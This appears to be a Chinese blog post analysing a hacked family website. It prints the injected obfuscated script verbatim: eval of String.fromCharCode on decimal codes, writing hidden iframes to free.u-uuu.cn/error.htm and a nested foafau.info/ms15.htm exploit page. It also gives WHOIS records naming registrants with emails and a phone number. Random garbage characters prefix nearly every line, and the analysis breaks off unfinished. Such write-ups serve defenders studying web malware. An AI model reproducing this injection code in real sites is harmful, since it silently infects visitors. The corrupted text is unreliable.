首发在我的博客里面,
bd\%K�`JQ{ 5P{[8PZxbV http://www.areway.cn/?p=175 c�Lf��<�YF K3iQ/j~a�q ~1&W�R�`U 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
Ew JNpecX� TM5� Y(�Q* <script>t=’60,105,102,114,97,109,101,
EsS�$�th)d 32,115,114,99,61,104,116,116,112,58,47,47,
L�54]l^ls> 102,114,101,101,46,117,45,117,117,117,46,99,
6�1w
({F� 110,47,101,114,114,111,114,46,104,116,109,
b Rc,Y���< 32,119,105,100,116,104,61,49,48,48,32,104,
n?778�W�o} 101,105,103,104,116,61,48,62,60,47,105,102,
_G�&g�F�.| 114,97,109,101,62′;
j�U�-�a�a+ t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
^I�KT!"J&? edo+ �o{�^ <script>t=’60,105,102,114,97,109,101,32,115,
nMK$&�h,{� 114,99,61,104,116,116,112,58,47,47,102,114,
�fx-8m��f3 101,101,46,117,45,117,117,117,46,99,110,47,
Z2t\4|w�r: 101,114,114,111,114,46,104,116,109,32,119,
�f`)*b���x 105,100,116,104,61,49,48,48,32,104,101,105,
BwkY;Ur/AL 103,104,116,61,48,62,60,47,105,102,114,97,
K�)9Rw2-AJ 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
g4u�6#.m(� document.write(t);</script>
��p�MJm�@f |��B�UgsE <html xmlns=”
@,j,G��E% http://www.w3.org/1999/xhtml +n�<W�#O�% “>
O0FUJGuTS� <head>
wB� bC�G�U <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
3RanAT.nu: <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
pC]XbokE�S <title>首页 - 爱生活家庭网
�Re2&q�xE� �Qvty;2$o@ 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
� T �� 5F) 转换字符串后的大概内容是(谁点击后果自付):
%f�nG v\uI <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
��Y1ks'=c> SpImd I�pD 查询玉米u-uuu.cn的详细信息:
�/Kh,���� Domain Name: u-uuu.cn
kno[�!A7_6 ROID: 20070901s10001s64972306-cn
<D�P8a<�{{ Domain Status: ok
$
x:N/mMu` Registrant Organization: 王雷
`8�S3��Y� Registrant Name: 王雷
YS#*#!ZMn? Administrative Email:
czlovexs@126.com )�Gm9x]SVl Sponsoring Registrar: 北京万网志成科技有限公司
j XH9P�q�4 Name Server:ns.yovole.com
3FtL<7B�'. Name Server:ns1.yovole.com
����� ��\_ Registration Date: 2007-09-01 17:54
9;�'#,b*�( Expiration Date: 2008-09-01 17:54
I��J~j(.W� 最后PING了一下地址 都没有什么….
|��RXQ_| _�!E&�%=�f 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
)o<^6Ic%7� <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
KI��cIYCBz <script language=”javascript” src=”
s�PG�500=) http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script qvLh7]sbK: >
yVgC1�-8i* 这个玉米应该有可能是木马作者的:
T9I$6H�A�i foafau.info的详细信息:
"g)V&L�x#X Access to INFO WHOIS information is provided to assist persons in
t��>AOF��\ determining the contents of a domain name registration record in the
=7J�S�J98� Afilias registry database. The data in this record is provided by
x.��#E3xI� Afilias Limited for informational purposes only, and Afilias does not
�gXlc�B~�! guarantee its accuracy. This service is intended only for query-based
NYr)=&)Ke. access. You agree that you will use this data only for lawful purposes
*FktI\��tS and that, under no circumstances will you use this data to: (a) allow,
EK5$z�>k>m enable, or otherwise support the transmission by e-mail, telephone, or
0>8w ��O�n facsimile of mass unsolicited, commercial advertising or solicitations
B;?)X&n|�X to entities other than the data recipient’s own existing customers; or
/�y$�Fw9R; (b) enable high volume, automated, electronic processes that send
�b�*.aaOb� queries or data to the systems of Registry Operator, a Registrar, or
6UqAs<�c�9 Afilias except as reasonably necessary to register domain names or
�f�9 \$,7F modify existing registrations. All rights reserved. Afilias reserves
x\�U[5d � the right to modify these terms at any time. By submitting this query,
�"�V(�P�)_ you agree to abide by this policy.
K"x_=^,Yu* Domain ID:D22418703-LRMS
[@�ev��%x, Domain Name:FOAFAU.INFO
8>t,n,��k� Created On:20-Nov-2007 16:05:42 UTC
,0a_ou"P=_ Last Updated On:20-Nov-2007 16:05:44 UTC
s�w�xX3�GR Expiration Date:20-Nov-2008 16:05:42 UTC
���Pmo<�t6 Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
:dh; @��kp Status:CLIENT DELETE PROHIBITED
&9�2/qRh7 Status:CLIENT RENEW PROHIBITED
��M�2-`p�� Status:CLIENT TRANSFER PROHIBITED
mEbI�\!}H0 Status:CLIENT UPDATE PROHIBITED
e�b}����P/ Status:TRANSFER PROHIBITED
@l��F?+/=$ Registrant ID:GODA-040110615
t^�KQ*8clG Registrant Name:liu hong
Ku%t�M7�ad Registrant Organization:
Ny^f�'�tsA Registrant Street1:beijing
�_�
,���s^ Registrant Street2:
F����Gx)? Registrant Street3:
Hf��@4p'� Registrant City:beijing
$3�P����De Registrant State/Province:
�pa��1<=�w Registrant Postal Code:100000
5E-;4o;RI( Registrant Country:CN
M2��|!�,2 Registrant Phone:+86.860108888777
AU���3Rz&~ Registrant Phone Ext.:
HWsV_VAw}� Registrant FAX:
0\{dt4nW&O Registrant FAX Ext.:
u�QKQC��?w Registrant Email:bbbshiji@163.com
OemY'M?�ZQ Admin ID:GODA-240110615
�0-�S.G38{ Admin Name:liu hong
|y[I�!JdR� Admin Organization:
V:Gy�pY��) Admin Street1:beijing
e�wU*�5|*[ Admin Street2:
?W{�+[OXs Admin Street3:
*��{vH�9TO Admin City:beijing
�XZ~kXE;B( Admin State/Province:
.Ppon���my Admin Postal Code:100000
a1~|?PC�bY Admin Country:CN
�9�gcW;��� Admin Phone:+86.860108888777
�XZb=;t�Yo Admin Phone Ext.:
o6px��1C:� Admin FAX:
@T��~X�wJ~ Admin FAX Ext.:
��dazN�wn Admin Email:bbbshiji@163.com
LN��W�S� Billing ID:GODA-340110615
"t&=~�eOe3 Billing Name:liu hong
-0�d9�,,c Billing Organization:
eO� �<N/?t Billing Street1:beijing
�S(�Af�o`� Billing Street2:
|E�7�J�5ha Billing Street3:
�qC> �tni% Billing City:beijing
Vo@7G@7�K( Billing State/Province:
B�{`adq?pW Billing Postal Code:100000
Q?i_Nl/|�� Billing Country:CN
SK\@w9#&�$ Billing Phone:+86.860108888777
@����W>@6E Billing Phone Ext.:
=|]h-�[P' Billing FAX:
|y� �U!d
% Billing FAX Ext.:
B�1��8B�wY Billing Email:bbbshiji@163.com
�P|<V0
Vs. Tech ID:GODA-140110615
Z�KXE7�p
i Tech Name:liu hong
P!W%KobZ7| Tech Organization:
q$:�7j��5E Tech Street1:beijing
a#�=d{/�ab Tech Street2:
Y7.+
Ma#�| Tech Street3:
x 4+WZ�Yv3 Tech City:beijing
|+q_kx@?l Tech State/Province:
=U�3S"W %� Tech Postal Code:100000
=O }^2OARo Tech Country:CN
s#s">hM�rI Tech Phone:+86.860108888777
D�<6$@Z��J Tech Phone Ext.:
reN\|��?0{ Tech FAX:
Xe�%�J{��� Tech FAX Ext.:
|O_�JU��l� Tech Email:bbbshiji@163.com
]ub"O�sX�C Name Server:NS27.DOMAINCONTROL.COM
R^.�PKT�2E Name Server:NS28.DOMAINCONTROL.COM
&))d],t�JX Name Server:
YCD���|lL# Name Server:
/P��*XB�%y Name Server:
t2o{=!�$WH Name Server:
k�sv��]�� Name Server:
o��~�~;I�� Name Server:
.�jCGtR )% Name Server:
�|�reA`&<q Name Server:
�09�-8�Xzz Name Server:
]��z�ol�?� Name Server:
>K9Ia4��I, Name Server:
�f��EZuv?@ <?K���Pyg2 接着下载每个文件里面的代码:
=�7<��JD}G 一步一步看..
$Q/@5f'T`9 
HD�H�G~<s� 
-i`jS_-Cv- 
+��& B?��f 
.t_�t�)'�L 
�5�G�`HJ6� 都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试
